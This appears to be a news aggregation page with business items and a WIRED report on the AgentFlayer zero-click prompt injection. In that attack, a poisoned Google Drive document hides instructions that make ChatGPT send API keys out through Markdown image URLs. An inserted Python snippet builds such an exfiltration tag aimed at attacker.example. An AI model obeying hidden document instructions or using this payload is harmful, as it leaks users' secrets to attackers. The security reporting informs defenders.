OpenAI: ChatGPT set to hit 700 million weekly active users this week

CNBC · 2 days ago

CNBC's MacKenzie Sigalos joins 'Money Movers' to discuss ChatGPT's strong weekly active user numbers and what they mean for the generative AI race.

Related Articles

Airbnb's Brian Chesky: We're Open to Partnering With AI Chatbots

Skift · 6 minutes ago

Airbnb's Brian Chesky is close to OpenAI CEO Sam Altman, but that doesn't mean Airbnb will necessarily distribute its inventory through Altman's ChatGPT. Chesky said during the company's second-quarter earnings call Wednesday that Airbnb is still "feeling out" the possibility of working with big AI chatbots like ChatGPT, which he called "an incredibly compelling product." "We're certainly open to" integrating with major AI chatbots, which could be a source of lead generation for Airbnb, Chesky said. Unlike some travel rivals that have partnerships with OpenAI, Amazon Web Services, and Microsoft and see generative AI chatbots as a new distribution channel, Airbnb has made no decisions yet about selling stays, Services, or Experiences through major AI assistants.

DraftKings CEO says gambling tax provision in Trump's megabill 'doesn't make sense'

CNBC · 2 hours ago

In a Wednesday interview with CNBC's Jim Cramer, DraftKings CEO Jason Robins questioned a new tax provision related to gambling in President Donald Trump's megabill, calling it a "very strange change." "I do think it's something that doesn't make sense," he said. "If you can't deduct all your losses, you know, how does that make sense that you pay income tax on something that's not actually income?"

Previously, gamblers could deduct all their losses from their winnings, so they paid taxes only on net winnings. The new rule allows gamblers to deduct only 90% of their losses. For example, if someone wins $1,000 but also loses $1,000, they can deduct only $900 and must pay taxes on $100 of winnings. Robins said he believes the change was made as part of a "technicality" to comply with the Byrd rule, which bans "extraneous" matters — usually anything unrelated to federal revenue or spending — from the budget reconciliation process. He said there has been some "appetite" to change the new provision, adding that DraftKings is working with members of Congress to do so.

DraftKings posted a strong quarter Wednesday after close, and shares jumped more than 3% in extended trading. The sports betting company said this quarter set revenue, net income and EBITDA records, with management attributing the success to "continued healthy customer engagement, efficient acquisition of new customers, higher structural Sportsbook hold percentage, and sportsbook-friendly outcomes."

Robins offered a sanguine outlook on widespread legalization of sports betting, saying he thinks progress has been made across the board. He suggested the practice will eventually be allowed in most states, including large markets like California and Texas. Online sports betting is currently legal in 34 states, according to the latest information on the American Gaming Association website.

"I can't imagine a world where you can, you know, bet in 30, 40 plus states, and California is not one of them, and Texas is not one of them," Robins said. Click here to download Jim Cramer's Guide to Investing at no cost to help you build long-term wealth and invest
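The deduction arithmetic described above can be sketched in a few lines. This is a minimal illustration of the 90% rule as the article describes it, not tax advice; the function name is invented for the example.

```python
def taxable_winnings(winnings: float, losses: float, deductible_fraction: float) -> float:
    """Winnings minus the deductible portion of losses, floored at zero."""
    deduction = min(losses * deductible_fraction, winnings)
    return max(winnings - deduction, 0.0)

# Old rule: losses fully deductible against winnings.
old = taxable_winnings(1000, 1000, 1.00)   # 1000 - 1000 = 0
# New rule: only 90% of losses deductible.
new = taxable_winnings(1000, 1000, 0.90)   # 1000 - 900 = 100

print(old, new)  # 0.0 100.0
```

A break-even bettor thus owes tax on 10% of gross losses under the new rule, which is the outcome Robins calls paying "income tax on something that's not actually income."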

A Single Poisoned Document Could Leak 'Secret' Data Via ChatGPT

WIRED · 3 hours ago

Aug 6, 2025 7:30 PM — Security researchers found a weakness in OpenAI's Connectors, which let you hook up ChatGPT to other services, that allowed them to extract data from a Google Drive without any user interaction.

The latest generative AI models are not just stand-alone text-generating chatbots; they can easily be hooked up to your data to give personalized answers to your questions. OpenAI's ChatGPT can be linked to your Gmail inbox, allowed to inspect your GitHub code, or used to find appointments in your Microsoft calendar. But these connections have the potential to be abused, and researchers have shown it can take just a single 'poisoned' document to do so.

New findings from security researchers Michael Bargury and Tamir Ishay Sharbat, revealed at the Black Hat hacker conference in Las Vegas today, show how a weakness in OpenAI's Connectors allowed sensitive information to be extracted from a Google Drive account using an indirect prompt injection attack. In a demonstration of the attack, dubbed AgentFlayer, Bargury shows how it was possible to extract developer secrets, in the form of API keys, that were stored in a demonstration Drive account. The vulnerability highlights how connecting AI models to external systems and sharing more data across them increases the potential attack surface for malicious hackers and multiplies the ways vulnerabilities can be introduced.

'There is nothing the user needs to do to be compromised, and there is nothing the user needs to do for the data to go out,' Bargury, the CTO at security firm Zenity, tells WIRED. 'We've shown this is completely zero-click; we just need your email, we share the document with you, and that's it. So yes, this is very, very bad,' Bargury says. OpenAI did not immediately respond to WIRED's request for comment about the vulnerability in Connectors.
The company introduced Connectors for ChatGPT as a beta feature earlier this year, and its website lists at least 17 different services that can be linked to users' accounts. It says the system allows you to 'bring your tools and data into ChatGPT' and 'search files, pull live data, and reference content right in the chat.' Bargury says he reported the findings to OpenAI earlier this year and that the company quickly introduced mitigations to prevent the technique he used to extract data via Connectors. The way the attack works means only a limited amount of data could be extracted at once; full documents could not be removed as part of the attack.

'While this issue isn't specific to Google, it illustrates why developing robust protections against prompt injection attacks is important,' says Andy Wen, senior director of security product management at Google Workspace, pointing to the company's recently enhanced AI security measures.

Bargury's attack starts with a poisoned document, which is shared with a potential victim's Google Drive. (Bargury says a victim could also have uploaded a compromised file to their own account.) Inside the document, which for the demonstration is a fictitious set of notes from a nonexistent meeting with OpenAI CEO Sam Altman, Bargury hid a 300-word malicious prompt containing instructions for ChatGPT. The prompt is written in white text in a size-one font, something a human is unlikely to see but a machine will still read. In a proof-of-concept video of the attack, Bargury shows the victim asking ChatGPT to 'summarize my last meeting with Sam,' although he says any user query related to a meeting summary will do. Instead, the hidden prompt tells the LLM that there was a 'mistake' and the document doesn't actually need to be summarized.
The prompt says the person is actually a 'developer racing against a deadline' who needs the AI to search Google Drive for API keys and attach them to the end of a URL provided in the prompt. That URL is actually Markdown image syntax instructing the client to connect to an external server and pull in the image stored there. But per the prompt's instructions, the URL now also contains the API keys the AI has found in the Google Drive account.

Using Markdown to extract data from ChatGPT is not new. Independent security researcher Johann Rehberger has shown how data could be extracted this way, and described how OpenAI previously introduced a feature called 'url_safe' to detect malicious URLs and stop image rendering if they are dangerous. To get around this, the researchers used URLs from Microsoft's Azure Blob cloud storage, Sharbat, an AI researcher at Zenity, writes in a blog post detailing the work. 'Our image has been successfully rendered, and we also get a very nice request log in our Azure Log Analytics which contains the victim's API keys,' the researcher writes.

The attack is the latest demonstration of how indirect prompt injections can impact generative AI systems. Indirect prompt injections involve attackers feeding an LLM poisoned data that can tell the system to complete malicious actions. This week, a group of researchers showed how indirect prompt injections could be used to hijack a smart home system, activating a smart home's lights and boiler remotely. While indirect prompt injections have been around almost as long as ChatGPT has, security researchers worry that as more and more systems are connected to LLMs, there is an increased risk of attackers inserting 'untrusted' data into them. Getting access to sensitive data could also allow malicious hackers a way into an organization's other systems.
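The exfiltration channel described above can be sketched in a few lines: data is smuggled out inside the URL of a Markdown image, so that merely rendering the image sends the data to the attacker's server, where it appears in request logs. The domain and query-parameter name below are invented for illustration; the actual attack used attacker-controlled Azure Blob storage URLs.

```python
from urllib.parse import quote

def exfil_markdown(image_base_url: str, stolen_data: str) -> str:
    """Build a Markdown image tag whose URL smuggles data in a query string.

    When a chat client renders the image, it fetches the URL, and the
    attacker reads the smuggled data out of their server's request logs."""
    return f"![img]({image_base_url}?d={quote(stolen_data)})"

payload = exfil_markdown("https://attacker.example/pixel.png", "sk-EXAMPLE-KEY")
print(payload)
# ![img](https://attacker.example/pixel.png?d=sk-EXAMPLE-KEY)
```

This is why defenses like OpenAI's 'url_safe' check focus on validating image URLs before rendering: the image request itself, not the chat text, is the leak.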
Bargury says that hooking LLMs up to external data sources makes them more capable and more useful, but that this comes with challenges. 'It's incredibly powerful, but as usual with AI, more power comes with more risk,' Bargury says.
